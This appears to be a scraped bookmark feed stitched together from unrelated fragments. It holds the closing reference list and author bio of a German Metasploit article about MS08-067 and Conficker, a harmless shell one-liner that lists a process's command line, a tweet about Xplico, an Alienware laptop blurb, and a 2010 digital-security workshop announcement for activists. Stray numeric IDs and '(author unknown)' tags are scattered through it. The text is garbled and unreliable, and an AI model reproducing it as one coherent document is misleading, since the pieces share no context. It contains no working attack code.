Der Artikel in dieser Ausgabe stellt den zweiten Teil einer mehrteiligen Metasploit Serie dar. Falls Sie den ersten Teil dieser Serie verpasst haben, nehmen Sie Kontakt mit dem Autor oder der hakin9 Redaktion auf. Dieser Artikel sollte einen tieferen Einblick in das Framework ermöglichen und zeigen, wie es durch relativ kleine und einfache Anpassungen enorm an Flexibilität gewinnen kann. In den folgenden Ausgaben dieser Artikelserie wird untersucht, welche Möglichkeiten Metasploit im Bereich der Automatisierung bietet, welche weiteren Komponenten zur Verfügung stehen und wie diese Komponenten einen Pentester unterstützen können. Des Weiteren wird analysiert, wie Metasploit bei Client Side Attacks helfen kann und wie weitere Komponenten des Frameworks in den Penetration Testing Prozess eingebunden werden können.

Im Internet - Sources

• http://www.s3cur1ty.de/hakin9-metasploit-the-basics - Teil 1 der Artikelserie
• http://metasploit.com/ - Metasploit Webseite
• http://www.milw0rm.com/papers/320 - How Conficker makes use of MS08-067
• http://www.ollydbg.de/download.htm - Download von Olydbg
• http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx - Microsoft Security Bulletin for MS08-067
• http://www.heise.de/security/Microsoft-Kunden-spielen-Russisches-Roulett... - Heise Meldung zum Patchverhalten und zu MS08-067
• http://www.heise.de/security/Windows-Wurm-nimmt-an-Fahrt-auf--/news/meld... - Windows Wurm nimmt an Fahrt auf
• http://www.heise.de/security/Studie-2-5-Millionen-PCs-mit-Conficker-Wurm... - 2, 5 Millionen PCs mit Conficker Wurm infiziert
• http://www.confickerworkinggroup.org/wiki/ - Conficker Working Group
• http://www.microsoft.com/downloads/details.aspx?FamilyId=95AC1610-C232-4... – Download von SP2 für Windows 2003 Server
• http://spool.metasploit.com/pipermail/framework/2009-April/009129.html - Opcode search
• http://nmap.org/book/ - Nmap Online Buch
• http://nmap.org/book/nse.html - Nmap Scripting Engine
• http://www.heise.de/newsticker/meldung/142138 - Heise News zu Nmap V5.0 Release
• http://www.heise.de/security/Vergitterte-Fenster-Teil-1--/artikel/44462/3 - Beschreibung von NX auf Heise
• http://support.microsoft.com/kb/875351/de - KB Artikel von Microsoft zu Datenausführungsverhinderung
• http://support.microsoft.com/kb/875352/de - weiterer KB Artikel von Microsoft zu Datenausführungsverhinderung
• http://www.s3cur1ty.de – Weitere Informationen zu dieser Metasploit Artikel Serie

Portrait Integralis

Als in Europa führender Security Solution Provider zeichnet sich die Integralis durch ein umfassendes internationales Know-how und durch ein umfangreiches Angebot an IT-Sicherheitslösungen aus. Ihren Kunden bietet die Integralis kompetentes Consulting und maßgeschneiderte Services zur Absicherung kritischer Geschäftsprozesse.
Das auf marktführenden Sicherheitstechnologien und strategischen Partnerschaften basierende Portfolio ist auf die Planung, die Umsetzung und den Betrieb von übergreifenden Informationssicherheits-Architekturen ausgerichtet.

Über den Autor

Michael Messner
Der Autor ist IT Security Consultant bei der Integralis Deutschland GmbH. Er führt regelmäßig Sicherheitsüberprüfungen namhafter deutscher Unternehmen und Konzerne durch. Die dabei aufgedeckten Schwachstellen dienen den Unternehmen als Grundlage für die Verbesserung ihrer technischen sowie organisatorischen Sicherheit.

Kontakt mit dem Autor:
michael [ dot ] messner [ at ] integralis [ dot ] com
http://www.integralis.com
http://www.s3cur1ty.de

m1k3

$ cat /proc/$(lsof -ti:8888)/cmdline | tr "\0" " "

• View this command to comment, vote or add to favourites
• View all commands by glaudiston

by David Winterbottom (codeinthehole.com)

(author unknown)0251674920623560579409517266611154809650

purehate_: Ok, Today I will get Xplico working on backtrack and added to the repo #goalfortheday #backtrack(author unknown)02516749206235605794

 Bookmark this on Delicious - Saved by jafaj to informàtica wifi hackers túnel dns seguretat - More about this bookmark jafaj02516749206235605794

Pocket Gamer. A few manufacturers have already tried themselves in the ultra-mobile gaming notebook division – but none of them were really successful so far. Now Alienware is taking a shot at creating a gaming suitable subnotebook in a 11.1 inch size. An overclocked Intel Core C2D UL energy savings CPU and the strong Geforce GT 335M are to provide for the necessary frame rates. Read here about this combination's performance.(author unknown)02516749206235605794

March 12th 2010, 6pm-9pm

Digital Security and Tactics For (and By) Anti Authoritarians is an one night attempt to share information and skills on digital security, tools, and news between an anti authoritarian tech and activist community. It will be a 3 hour meeting with presentations on basic digital security practices and tools from

* Ringo of Olympia Hackbloc presenting on basic computer security, privacy, encryption, and anonymity
* overview and use of Tor by Jacob Appelbaum,
* tentative report back from Elija of riseup.net,
* and a discussion of next generation tools for activists by Elliott Madison, arrested in PA during the G20 action for allegedly using twitter.
<!--break-->
Digital Security and Tactics For (and By) Anti Authoritarians is part of 8 days of Anarchy that happens every year that coincides with the Anarchist Bookfaire put on by bound together books, and the BASTARD (Berkeley Anarchist Students of Theory And Research and Development) Conference . You can check the respective sites for more information related to those events.

hackbloc.org's mission is to research, create and disseminate information, tools, and tactics that empower people to use technology in a way that is liberating. We support and strengthen our local communities through education and action. We strive to learn from each other and focus our skills toward creative goals, to explore and research positive hacktivism, and to defend a free internet and free society!

More info at SF Noisebridge.

All tags: seeyouthere security noisebridge encryption 8days Login or register to tag items (author unknown)

 Bookmark this on Delicious - Saved by davidfano to drupal intranet - More about this bookmark davidfano02516749206235605794